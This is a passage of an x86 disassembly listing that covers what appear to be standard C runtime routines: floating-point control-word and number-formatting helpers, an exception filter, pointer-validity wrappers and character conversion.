loc_41E091: ; CODE XREF: sub_41DDF6+221�j
; sub_41DDF6+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41E0A8
test byte ptr [ebp+arg_4], 8
jz short loc_41E0A8
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_41E0A8: ; CODE XREF: sub_41DDF6+29F�j
; sub_41DDF6+2A5�j
mov eax, ebx
loc_41E0AA: ; CODE XREF: sub_41DDF6+1D9�j
; sub_41DDF6+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DDF6 endp
; =============== S U B R O U T I N E =======================================
sub_41E0AF proc near ; CODE XREF: sub_41A43E+52�p
xor eax, eax
retn
sub_41E0AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0B2 proc near ; CODE XREF: sub_41E0E7+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_41E0FD
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_41E18F
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_41E0B2 endp
; =============== S U B R O U T I N E =======================================
sub_41E0E7 proc near ; CODE XREF: sub_41A72A+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41E0B2
pop ecx
pop ecx
retn
sub_41E0E7 endp
; =============== S U B R O U T I N E =======================================
sub_41E0FD proc near ; CODE XREF: sub_41E0B2+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_41E10E
push 10h
pop eax
loc_41E10E: ; CODE XREF: sub_41E0FD+C�j
test bl, 4
jz short loc_41E115
or al, 8
loc_41E115: ; CODE XREF: sub_41E0FD+14�j
test bl, 8
jz short loc_41E11C
or al, 4
loc_41E11C: ; CODE XREF: sub_41E0FD+1B�j
test bl, 10h
jz short loc_41E123
or al, 2
loc_41E123: ; CODE XREF: sub_41E0FD+22�j
test bl, 20h
jz short loc_41E12A
or al, 1
loc_41E12A: ; CODE XREF: sub_41E0FD+29�j
test bl, 2
jz short loc_41E134
or eax, 80000h
loc_41E134: ; CODE XREF: sub_41E0FD+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_41E16C
cmp edx, 400h
jz short loc_41E169
cmp edx, 800h
jz short loc_41E165
cmp edx, esi
jnz short loc_41E16C
or eax, edi
jmp short loc_41E16C
; ---------------------------------------------------------------------------
loc_41E165: ; CODE XREF: sub_41E0FD+5E�j
or eax, ebp
jmp short loc_41E16C
; ---------------------------------------------------------------------------
loc_41E169: ; CODE XREF: sub_41E0FD+56�j
or ah, 1
loc_41E16C: ; CODE XREF: sub_41E0FD+4E�j
; sub_41E0FD+62�j ...
and ecx, edi
pop esi
jz short loc_41E17C
cmp ecx, ebp
jnz short loc_41E181
or eax, 10000h
jmp short loc_41E181
; ---------------------------------------------------------------------------
loc_41E17C: ; CODE XREF: sub_41E0FD+72�j
or eax, 20000h
loc_41E181: ; CODE XREF: sub_41E0FD+76�j
; sub_41E0FD+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_41E18E
or eax, 40000h
locret_41E18E: ; CODE XREF: sub_41E0FD+8A�j
retn
sub_41E0FD endp
; =============== S U B R O U T I N E =======================================
sub_41E18F proc near ; CODE XREF: sub_41E0B2+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_41E19F
push 1
pop eax
loc_41E19F: ; CODE XREF: sub_41E18F+B�j
test bl, 8
jz short loc_41E1A6
or al, 4
loc_41E1A6: ; CODE XREF: sub_41E18F+13�j
test bl, 4
jz short loc_41E1AD
or al, 8
loc_41E1AD: ; CODE XREF: sub_41E18F+1A�j
test bl, 2
jz short loc_41E1B4
or al, 10h
loc_41E1B4: ; CODE XREF: sub_41E18F+21�j
test bl, 1
jz short loc_41E1BB
or al, 20h
loc_41E1BB: ; CODE XREF: sub_41E18F+28�j
test ebx, 80000h
jz short loc_41E1C5
or al, 2
loc_41E1C5: ; CODE XREF: sub_41E18F+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_41E1F2
cmp ecx, 100h
jz short loc_41E1EF
cmp ecx, esi
jz short loc_41E1EA
cmp ecx, edx
jnz short loc_41E1F2
or ah, 0Ch
jmp short loc_41E1F2
; ---------------------------------------------------------------------------
loc_41E1EA: ; CODE XREF: sub_41E18F+50�j
or ah, 8
jmp short loc_41E1F2
; ---------------------------------------------------------------------------
loc_41E1EF: ; CODE XREF: sub_41E18F+4C�j
or ah, 4
loc_41E1F2: ; CODE XREF: sub_41E18F+44�j
; sub_41E18F+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41E208
cmp ecx, 10000h
jnz short loc_41E20A
or eax, esi
jmp short loc_41E20A
; ---------------------------------------------------------------------------
loc_41E208: ; CODE XREF: sub_41E18F+6B�j
or eax, edx
loc_41E20A: ; CODE XREF: sub_41E18F+73�j
; sub_41E18F+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_41E217
or ah, 10h
locret_41E217: ; CODE XREF: sub_41E18F+83�j
retn
sub_41E18F endp
; =============== S U B R O U T I N E =======================================
sub_41E218 proc near ; CODE XREF: sub_41E2B7+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_41E25D
inc esi
cmp esi, 3
jge short loc_41E258
lea eax, [eax+esi*4]
loc_41E24A: ; CODE XREF: sub_41E218+3E�j
cmp dword ptr [eax], 0
jnz short loc_41E25D
inc esi
add eax, 4
cmp esi, 3
jl short loc_41E24A
loc_41E258: ; CODE XREF: sub_41E218+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E25D: ; CODE XREF: sub_41E218+27�j
; sub_41E218+35�j
xor eax, eax
pop esi
retn
sub_41E218 endp
; =============== S U B R O U T I N E =======================================
sub_41E261 proc near ; CODE XREF: sub_41E2B7+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_41F266
add esp, 0Ch
dec esi
js short loc_41E2B3
lea edi, [ebx+esi*4]
loc_41E29A: ; CODE XREF: sub_41E261+50�j
test eax, eax
jz short loc_41E2B3
push edi
push 1
push dword ptr [edi]
call sub_41F266
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41E29A
loc_41E2B3: ; CODE XREF: sub_41E261+34�j
; sub_41E261+3B�j
pop edi
pop esi
pop ebx
retn
sub_41E261 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2B7 proc near ; CODE XREF: sub_41E412+81�p
; sub_41E412+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_41E31B
inc ebx
push ebx
push [ebp+arg_0]
call sub_41E218
pop ecx
test eax, eax
pop ecx
jnz short loc_41E318
push edi
push [ebp+arg_0]
call sub_41E261
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_41E318: ; CODE XREF: sub_41E2B7+51�j
mov eax, [ebp+arg_4]
loc_41E31B: ; CODE XREF: sub_41E2B7+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_41E33B
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_41E33B: ; CODE XREF: sub_41E2B7+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41E2B7 endp
; =============== S U B R O U T I N E =======================================
sub_41E343 proc near ; CODE XREF: sub_41E412+75�p
; sub_41E412+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_41E351: ; CODE XREF: sub_41E343+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41E351
pop esi
retn
sub_41E343 endp
; =============== S U B R O U T I N E =======================================
sub_41E35E proc near ; CODE XREF: sub_41E412+5F�p
; sub_41E412+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_41E35E endp
; =============== S U B R O U T I N E =======================================
sub_41E36A proc near ; CODE XREF: sub_41E412+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_41E370: ; CODE XREF: sub_41E36A+12�j
cmp dword ptr [eax], 0
jnz short loc_41E382
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_41E370
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41E382: ; CODE XREF: sub_41E36A+9�j
xor eax, eax
retn
sub_41E36A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E385 proc near ; CODE XREF: sub_41E412+C0�p
; sub_41E412+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_41E3BB: ; CODE XREF: sub_41E385+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_41E3BB
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_41E3ED: ; CODE XREF: sub_41E385+86�j
cmp ebx, edi
jl short loc_41E400
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_41E407
; ---------------------------------------------------------------------------
loc_41E400: ; CODE XREF: sub_41E385+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_41E407: ; CODE XREF: sub_41E385+79�j
dec ebx
sub ecx, 4
jns short loc_41E3ED
pop edi
pop esi
pop ebx
leave
retn
sub_41E385 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E412 proc near ; CODE XREF: sub_41E57E+D�p
; sub_41E594+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_41E47F
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_41E36A
test eax, eax
pop ecx
jnz loc_41E53E
lea eax, [ebp+var_C]
push eax
call sub_41E35E
pop ecx
loc_41E477: ; CODE XREF: sub_41E412+E4�j
push 2
loc_41E479: ; CODE XREF: sub_41E412+110�j
pop eax
jmp loc_41E540
; ---------------------------------------------------------------------------
loc_41E47F: ; CODE XREF: sub_41E412+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41E343
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E2B7
add esp, 10h
test eax, eax
jz short loc_41E4A0
inc ebx
loc_41E4A0: ; CODE XREF: sub_41E412+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_41E4B8
lea eax, [ebp+var_C]
push eax
call sub_41E35E
pop ecx
jmp short loc_41E4F4
; ---------------------------------------------------------------------------
loc_41E4B8: ; CODE XREF: sub_41E412+98�j
cmp ebx, eax
jg short loc_41E4FB
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E343
lea eax, [ebp+var_C]
push esi
push eax
call sub_41E385
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E2B7
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E385
add esp, 20h
loc_41E4F4: ; CODE XREF: sub_41E412+A4�j
xor esi, esi
jmp loc_41E477
; ---------------------------------------------------------------------------
loc_41E4FB: ; CODE XREF: sub_41E412+A8�j
cmp ebx, [edi]
jl short loc_41E527
lea eax, [ebp+var_C]
push eax
call sub_41E35E
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41E385
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_41E479
; ---------------------------------------------------------------------------
loc_41E527: ; CODE XREF: sub_41E412+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_41E385
pop ecx
pop ecx
loc_41E53E: ; CODE XREF: sub_41E412+55�j
xor eax, eax
loc_41E540: ; CODE XREF: sub_41E412+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_41E56F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_41E579
; ---------------------------------------------------------------------------
loc_41E56F: ; CODE XREF: sub_41E412+14E�j
cmp edi, 20h
jnz short loc_41E579
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_41E579: ; CODE XREF: sub_41E412+15B�j
; sub_41E412+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E412 endp
; =============== S U B R O U T I N E =======================================
sub_41E57E proc near ; CODE XREF: sub_41E5AA+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43AD90
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41E412
add esp, 0Ch
retn
sub_41E57E endp
; =============== S U B R O U T I N E =======================================
sub_41E594 proc near ; CODE XREF: sub_41E5D7+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43ADA8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41E412
add esp, 0Ch
retn
sub_41E594 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5AA proc near ; CODE XREF: sub_41A863+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F407
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E57E
add esp, 24h
leave
retn
sub_41E5AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5D7 proc near ; CODE XREF: sub_41A863+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F407
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E594
add esp, 24h
leave
retn
sub_41E5D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E604 proc near ; CODE XREF: sub_41A8A1+65�p
; sub_41A9A5+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_41E641
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41E627: ; CODE XREF: sub_41E604+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41E633
movsx edx, dl
inc ecx
jmp short loc_41E636
; ---------------------------------------------------------------------------
loc_41E633: ; CODE XREF: sub_41E604+27�j
push 30h
pop edx
loc_41E636: ; CODE XREF: sub_41E604+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41E627
mov edx, [ebp+arg_8]
loc_41E641: ; CODE XREF: sub_41E604+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41E65A
cmp byte ptr [ecx], 35h
jl short loc_41E65A
loc_41E64D: ; CODE XREF: sub_41E604+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_41E658
mov byte ptr [eax], 30h
jmp short loc_41E64D
; ---------------------------------------------------------------------------
loc_41E658: ; CODE XREF: sub_41E604+4D�j
inc byte ptr [eax]
loc_41E65A: ; CODE XREF: sub_41E604+42�j
; sub_41E604+47�j
cmp byte ptr [esi], 31h
jnz short loc_41E664
inc dword ptr [edx+4]
jmp short loc_41E676
; ---------------------------------------------------------------------------
loc_41E664: ; CODE XREF: sub_41E604+59�j
push edi
call sub_415B10
inc eax
push eax
push edi
push esi
call sub_416320
add esp, 10h
loc_41E676: ; CODE XREF: sub_41E604+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41E604 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E67B proc near ; CODE XREF: sub_41A8A1+3F�p
; sub_41A9A5+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E6DF
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_46BCD8
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_41F8D8
mov dword_46BD00, eax
add esp, 18h
movsx eax, byte_46BCDA
mov dword_46BCF8, eax
pop edi
movsx eax, word_46BCD8
mov dword_46BCFC, eax
mov dword_46BD04, offset dword_46BCDC
mov eax, offset dword_46BCF8
pop esi
leave
retn
sub_41E67B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6DF proc near ; CODE XREF: sub_41E67B+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_41E72D
cmp ebx, edi
jz short loc_41E726
lea edi, [ecx+3C00h]
jmp short loc_41E74E
; ---------------------------------------------------------------------------
loc_41E726: ; CODE XREF: sub_41E6DF+3D�j
mov edi, 7FFFh
jmp short loc_41E74E
; ---------------------------------------------------------------------------
loc_41E72D: ; CODE XREF: sub_41E6DF+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41E745
cmp edx, ebx
jnz short loc_41E745
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41E790
; ---------------------------------------------------------------------------
loc_41E745: ; CODE XREF: sub_41E6DF+52�j
; sub_41E6DF+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41E74E: ; CODE XREF: sub_41E6DF+45�j
; sub_41E6DF+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_41E766: ; CODE XREF: sub_41E6DF+A6�j
test ecx, esi
jnz short loc_41E787
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_41E766
; ---------------------------------------------------------------------------
loc_41E787: ; CODE XREF: sub_41E6DF+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41E790: ; CODE XREF: sub_41E6DF+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E6DF endp
; ---------------------------------------------------------------------------
push 2
call sub_417C0E
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_41E79E proc near ; DATA XREF: sub_41E7E4�o
; .text:0043A768�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41E7C1
cmp dword ptr [eax+10h], 3
jnz short loc_41E7C1
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41E7C1
jmp sub_41B42C
; ---------------------------------------------------------------------------
loc_41E7C1: ; CODE XREF: sub_41E79E+D�j
; sub_41E79E+13�j ...
mov eax, dword_46BD08
test eax, eax
jz short loc_41E7DE
push eax
call sub_41E83A
test eax, eax
pop ecx
jz short loc_41E7DE
push esi
call dword_46BD08
jmp short loc_41E7E0
; ---------------------------------------------------------------------------
loc_41E7DE: ; CODE XREF: sub_41E79E+2A�j
; sub_41E79E+35�j
xor eax, eax
loc_41E7E0: ; CODE XREF: sub_41E79E+3E�j
pop esi
retn 4
sub_41E79E endp
; =============== S U B R O U T I N E =======================================
sub_41E7E4 proc near ; DATA XREF: .text:00423024�o
push offset sub_41E79E
call dword_42101C ; SetUnhandledExceptionFilter
mov dword_46BD08, eax
retn
sub_41E7E4 endp
; =============== S U B R O U T I N E =======================================
sub_41E7F5 proc near ; DATA XREF: .text:0042303C�o
push dword_46BD08
call dword_42101C ; SetUnhandledExceptionFilter
retn
sub_41E7F5 endp
; =============== S U B R O U T I N E =======================================
sub_41E802 proc near ; CODE XREF: sub_41AC79+6B�p
; sub_41B18A+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_421018 ; IsBadReadPtr
test eax, eax
jz short loc_41E81A
xor esi, esi
loc_41E81A: ; CODE XREF: sub_41E802+14�j
mov eax, esi
pop esi
retn
sub_41E802 endp
; =============== S U B R O U T I N E =======================================
sub_41E81E proc near ; CODE XREF: sub_41B18A+73�p
; sub_41B18A+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_421184 ; IsBadWritePtr
test eax, eax
jz short loc_41E836
xor esi, esi
loc_41E836: ; CODE XREF: sub_41E81E+14�j
mov eax, esi
pop esi
retn
sub_41E81E endp
; =============== S U B R O U T I N E =======================================
sub_41E83A proc near ; CODE XREF: sub_41B18A+15B�p
; sub_41E79E+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call dword_421014 ; IsBadCodePtr
test eax, eax
jz short loc_41E84E
xor esi, esi
loc_41E84E: ; CODE XREF: sub_41E83A+10�j
mov eax, esi
pop esi
retn
sub_41E83A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B42C
loc_41E852: ; CODE XREF: sub_41B42C:loc_41B47D�j
push 0Ah
call sub_41D7B5
push 16h
call sub_41FB6B
pop ecx
pop ecx
push 3
call sub_417858
; END OF FUNCTION CHUNK FOR sub_41B42C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E869 proc near ; CODE XREF: sub_41B605+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_41E88C
cmp [ebp+arg_8], ebx
jz short loc_41E88C
mov al, [esi]
cmp al, bl
jnz short loc_41E892
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_41E88C
mov [eax], bx
loc_41E88C: ; CODE XREF: sub_41E869+C�j
; sub_41E869+11�j ...
xor eax, eax
loc_41E88E: ; CODE XREF: sub_41E869+42�j
; sub_41E869+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E892: ; CODE XREF: sub_41E869+17�j
cmp dword_46BB9C, ebx
jnz short loc_41E8AD
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_41E8A8
movzx ax, al
mov [ecx], ax
loc_41E8A8: ; CODE XREF: sub_41E869+36�j
; sub_41E869+C0�j
push 1
pop eax
jmp short loc_41E88E
; ---------------------------------------------------------------------------
loc_41E8AD: ; CODE XREF: sub_41E869+2F�j
mov ecx, off_4383F0
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E90A
mov eax, dword_4385FC
cmp eax, 1
jle short loc_41E8F1
cmp [ebp+arg_8], eax
jl short loc_41E8FB
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_46BBAC
call dword_421064 ; MultiByteToWideChar
test eax, eax
mov eax, dword_4385FC
jnz short loc_41E88E
loc_41E8F1: ; CODE XREF: sub_41E869+5C�j
cmp [ebp+arg_8], eax
jb short loc_41E8FB
cmp [esi+1], bl
jnz short loc_41E88E
loc_41E8FB: ; CODE XREF: sub_41E869+61�j
; sub_41E869+8B�j ...
mov dword_46BB04, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41E88E
; ---------------------------------------------------------------------------
loc_41E90A: ; CODE XREF: sub_41E869+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_46BBAC
call dword_421064 ; MultiByteToWideChar
test eax, eax
jnz loc_41E8A8
jmp short loc_41E8FB
sub_41E869 endp
; =============== S U B R O U T I N E =======================================
sub_41E931 proc near ; CODE XREF: sub_41B605+76�p
; sub_41B605+88�p ...
arg_0 = dword ptr 4
cmp dword_4385FC, 1
jle short loc_41E948
push 8
push [esp+4+arg_0]
call sub_418576
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41E948: ; CODE XREF: sub_41E931+7�j
mov eax, [esp+arg_0]
mov ecx, off_4383F0
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41E931 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41E960 proc near ; CODE XREF: sub_41B605+797�p
; sub_41B605+7E7�p
cmp cl, 40h
jnb short loc_41E97A
cmp cl, 20h
jnb short loc_41E970
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_41E970: ; CODE XREF: sub_41E960+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_41E97A: ; CODE XREF: sub_41E960+3�j
xor eax, eax
xor edx, edx
retn
sub_41E960 endp
; =============== S U B R O U T I N E =======================================
